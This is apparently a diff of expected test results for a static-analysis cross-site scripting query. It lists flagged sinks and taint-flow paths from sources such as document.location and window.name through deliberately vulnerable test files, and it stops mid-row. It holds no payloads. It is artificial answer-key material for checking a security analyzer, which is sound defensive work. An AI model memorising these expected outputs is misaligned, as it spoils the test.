+| tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:264:22:264:29 | location | user-provided value | +| tst.js:272:59:272:65 | tainted | tst.js:269:19:269:29 | window.name | tst.js:272:59:272:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:269:19:269:29 | window.name | user-provided value | +| tst.js:287:20:287:20 | e | tst.js:285:9:285:16 | location | tst.js:287:20:287:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:285:9:285:16 | location | user-provided value | +| tst.js:295:20:295:20 | e | tst.js:292:10:292:17 | location | tst.js:295:20:295:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:292:10:292:17 | location | user-provided value | +| tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:300:35:300:42 | location | user-provided value | +| tst.js:316:18:316:35 | params.get('name') | tst.js:311:18:311:34 | document.location | tst.js:316:18:316:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:311:18:311:34 | document.location | user-provided value | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | tst.js:325:20:325:36 | document.location | tst.js:327:5:327:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:325:20:325:36 | document.location | user-provided value | +| tst.js:333:12:333:17 | target | tst.js:332:16:332:39 | documen ... .search | tst.js:333:12:333:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:332:16:332:39 | documen ... .search | user-provided value | +| tst.js:340:16:340:21 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:340:16:340:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:344:21:344:26 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:344:21:344:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:347:18:347:23 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:347:18:347:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:357:18:357:23 | target | tst.js:355:16:355:39 | documen ... .search | tst.js:357:18:357:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:16:355:39 | documen ... .search | user-provided value | +| tst.js:367:18:367:23 | target | tst.js:364:16:364:39 | documen ... .search | tst.js:367:18:367:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:369:18:369:29 | target.taint | tst.js:364:16:364:39 | documen ... .search | tst.js:369:18:369:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:375:18:375:30 | target.taint3 | tst.js:374:19:374:42 | documen ... .search | tst.js:375:18:375:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:374:19:374:42 | documen ... .search | user-provided value | +| tst.js:380:18:380:30 | target.taint5 | tst.js:364:16:364:39 | documen ... .search | tst.js:380:18:380:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:389:18:389:30 | target.taint7 | tst.js:364:16:364:39 | documen ... .search | tst.js:389:18:389:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:392:18:392:30 | target.taint8 | tst.js:364:16:364:39 | documen ... .search | tst.js:392:18:392:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:400:18:400:24 | payload | tst.js:399:17:399:36 | window.location.hash | tst.js:400:18:400:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:399:17:399:36 | window.location.hash | user-provided value | +| tst.js:404:20:404:27 | match[1] | tst.js:402:15:402:34 | window.location.hash | tst.js:404:20:404:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:402:15:402:34 | window.location.hash | user-provided value | +| tst.js:407:18:407:51 | window. ... '#')[1] | tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:51 | window. ... '#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:407:18:407:37 | window.location.hash | user-provided value | +| tst.js:413:18:413:89 | target. ... data>') | tst.js:411:16:411:39 | documen ... .search | tst.js:413:18:413:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:411:16:411:39 | documen ... .search | user-provided value | +| tst.js:423:28:423:33 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:423:28:423:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:424:33:424:38 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:424:33:424:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:425:34:425:39 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:425:34:425:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:426:41:426:46 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:426:41:426:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:427:44:427:49 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:427:44:427:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:428:32:428:37 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:428:32:428:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:438:18:438:23 | source | tst.js:436:16:436:39 | documen ... .search | tst.js:438:18:438:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:439:18:439:42 | ansiToH ... source) | tst.js:436:16:436:39 | documen ... .search | tst.js:439:18:439:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:446:21:446:26 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:446:21:446:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:448:19:448:24 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:448:19:448:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:450:20:450:25 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:450:20:450:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:456:19:456:21 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:456:19:456:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:457:26:457:28 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:457:26:457:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:458:25:458:27 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:458:25:458:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:459:20:459:22 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:459:20:459:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:469:22:469:24 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:469:22:469:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:474:23:474:45 | locatio ... bstr(1) | tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:474:23:474:35 | location.hash | user-provided value | +| tst.js:477:18:477:40 | locatio ... bstr(1) | tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:477:18:477:30 | location.hash | user-provided value | +| tst.js:484:33:484:63 | decodeU ... n.hash) | tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:484:43:484:62 | window.location.hash | user-provided value | +| tst.js:492:18:492:54 | target. ... "), '') | tst.js:491:16:491:39 | documen ... .search | tst.js:492:18:492:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:491:16:491:39 | documen ... .search | user-provided value | +| tst.js:499:18:499:33 | unescape(source) | tst.js:498:16:498:26 | window.name | tst.js:499:18:499:33 | unescape(source) | Cross-site scripting vulnerability due to $@. | tst.js:498:16:498:26 | window.name | user-provided value | +| typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | +| v-html.vue:2:8:2:23 | v-html=tainted | v-html.vue:6:42:6:58 | document.location | v-html.vue:2:8:2:23 | v-html=tainted | Cross-site scripting vulnerability due to $@. | v-html.vue:6:42:6:58 | document.location | user-provided value | +| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:9:4:9:34 | "
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:9:4:9:34 | "
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:10:4:10:27 | `
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:10:4:10:27 | `
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:11:4:11:44 | "
    ") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:11:4:11:44 | "
    ") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:12:4:12:41 | ["
    " | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... .search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... .search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... .search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| 